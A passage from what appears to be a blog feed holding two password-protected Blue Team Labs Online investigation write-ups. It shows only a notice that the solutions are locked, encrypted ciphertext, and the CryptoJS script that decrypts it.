g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2022-03-29T17:53:10-04:002022-03-29T17:53:10-04:00Eric Turnertag:blog.ericturner.it,2022-03-29:/2022/03/29/btlo-investigation-eric/

This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.

<div id="pec-encrypted-content" style="display:none">YRH0gSnIKO2qzhaAlZLT4g==;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;^</div> <div id="pec-decrypted-content"> <h4><i>This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2022-03-25T16:03:42-04:002022-03-25T16:03:42-04:00Eric Turnertag:blog.ericturner.it,2022-03-25:/2022/03/25/btlo-investigation-heaven/

This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.

<div id="pec-encrypted-content" style="display:none">CDnhDwynczno2H6M2XbHFg==;SKxhPALE9QD6VFRdwHl1aLCI5Pzz3oe3N28qupUdE12SvjPHjSmyfWTtHyHPCv70cyD7cNvgzuK8ugnFU5uakJB/FMoYr1NWe24t3t/sY3f6YrmIIL8FFur1vfJV7AL5eVh3XxiMtrvcsJQG8/HEGpj9gHHMutezqCfZbBifcS7hl11SvWopCVBR6BKOamidQv5NZDngPY+CdGuT3l2NxR5JOmz4AqhCmAP+w1YTAwkhAYo8WAyYnb9LDNni3D/gRwGnBKHf7jRCfhjNBrDU7aSX/r8pKoRhFKaWxvvs5xtixP8ahO7kLj0SCOHzap/qcuFiZpmZP0MSciyQ33h/djUS/8u0Bm+h7qoaF+gMLfWgYSAAztcZ9rDjIC3LdlT5B13YpYGA5qpjehXw7/ptQ3HS8T5RKgcffA5GkqtzlH8rq+4hflPCVaubGVkGeUSV4Sk3M4ouAOrWz+xbGKIVjmdOo3umaFgDSwzViZscU6WBQ+xUfbUApZ3UzUo5qJYBJOvLB0ujIe7JISX6Ri55ecQgyoeEcFSSTSWE3ZOtX7u4z5HQzOGOWxXVKhHQ0s6yJToUURl3+ipWSypsOLidYM0iOxRaap/nbvbAlXvBnFbw4bt2Y5YnQZxVWZi3Id7xDH49dQCpNQq68NbLfrrRVSodBh7keXNXsUmn1AIINVl6WJ2TSel7lwrxM8xAWrcjpbXumuLGyfRD/upQdo50x2BIqdFzN2gUV7HkDih7q2KU+rgcProXXZ2AzByVHzJrwdBnOK+EUzPudz7Phl50JL+ME814tl69Eb0HY2BYOX19kLBXKHP1cVUJXw3HYC/2YQiWHqLD6OAmixXDwP0NH+Shyfh7qobB/SMy09tw5zxmQk4quRWwuQJgXe8UZVhA/myHFTRQEeiWAT0/gKWnilrQ6pO/nFK8A41D+ZE9DFBuibbYff1SzN4j6IodDs0I4BLFd7Tmk9lRsH8pKPA5TC2df33epWypxjrjxa5HYQxcWHqpbmB2v7pqrHd97/bezqrj+zzp3hLpR5o2xlWpV5Qjt6ZI3lvwseHkTZcNL/uRAJp5cMoDs+4UMYQfE3cwddXEigK59BKok3WdhjpIeJXzq+9iSN54EvV8kYCA+j4PfSPXwQsYW6/CNucGE9vv0CGfOyOUBcBvkkZP4E17epMppntJv3D9OTNMB4wzcMKbiCnvERA1e7HoQeh/Ha1nUqEp1iIAQ0sPr3C3r9qwj20v8y3JQVTejtLo/BXZxWX+